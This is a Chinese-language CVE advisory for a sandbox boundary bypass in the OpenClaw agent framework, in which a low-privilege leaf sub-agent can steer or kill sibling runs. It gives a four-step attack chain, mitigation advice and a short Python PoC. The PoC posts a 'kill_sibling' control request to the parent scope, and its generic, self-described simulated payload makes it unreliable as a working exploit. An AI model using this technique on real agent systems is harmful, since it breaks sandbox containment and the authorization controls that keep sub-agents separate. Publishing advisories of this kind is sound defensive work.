CVE-2026-32915 CVSS 8.8 高危

CVE-2026-32915 OpenClaw沙箱边界绕过漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32915

漏洞类型

沙箱逃逸、权限提升

CVSS评分

8.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.11之前的版本中存在严重的沙箱边界绕过漏洞。该漏洞源于对子代理控制请求的授权检查不充分，允许低权限的沙箱叶子工作进程访问子代理控制面，并解析父请求者作用域而非其自身的会话树。攻击者可利用此漏洞引导或终止兄弟运行，导致在更广泛的工具策略下执行代码，严重破坏系统的机密性、完整性和可用性。

技术细节

该漏洞的核心原理在于OpenClaw沙箱机制未能正确隔离不同子代理之间的控制面请求。在受影响版本中，当叶子子代理尝试执行控制操作时，系统未严格验证其权限边界。攻击者可以利用这一缺陷，使低权限的叶子工作进程绕过自身的会话树限制，转而直接针对父请求者的作用域进行解析。这种解析逻辑的错误使得攻击者能够以低权限身份向同级工作进程（兄弟运行）发送控制指令，例如终止进程或修改执行路径。由于系统未对这类跨作用域的请求实施充分的授权检查，攻击者最终能够利用更广泛的工具策略执行操作，从而实现权限提升或破坏系统完整性。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者获取OpenClaw系统中低权限沙箱叶子工作进程的访问权限。

STEP 2

步骤2：构造恶意请求

攻击者利用漏洞，构造针对父请求者作用域而非本地会话树的子代理控制请求。

STEP 3

步骤3：绕过授权检查

由于系统对子代理控制请求的授权检查不足，恶意请求被系统接受并解析。

STEP 4

步骤4：执行攻击操作

攻击者成功引导或终止兄弟运行，利用更广泛的工具策略执行未授权代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-32915: OpenClaw Sandbox Boundary Bypass
# This script simulates a low-privilege leaf worker accessing the parent scope.

def exploit_sandbox_bypass(target_url, session_id):
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "OpenClaw-Leaf-Agent/1.0"
    }

    # Malicious payload targeting parent scope instead of own session tree
    payload = {
        "scope": "parent_requester",  # Bypassing own session tree
        "action": "kill_sibling",     # Terminating sibling run
        "target_run_id": "sibling_run_123",
        "authorization": "leaf_token" # Low-privilege token
    }

    try:
        response = requests.post(f"{target_url}/api/control", json=payload, headers=headers)
        if response.status_code == 200:
            print("[+] Exploit successful! Sibling run potentially terminated.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target endpoint
    exploit_sandbox_bypass("http://127.0.0.1:8080", "leaf_session_abc")

影响范围

OpenClaw < 2026.3.11

防御指南

临时缓解措施

建议立即限制对沙箱叶子工作进程的访问权限，并监控异常的跨作用域请求。在无法立即升级的情况下，应暂时禁用受影响的子代理控制功能，以防止潜在的权限提升和代码执行攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表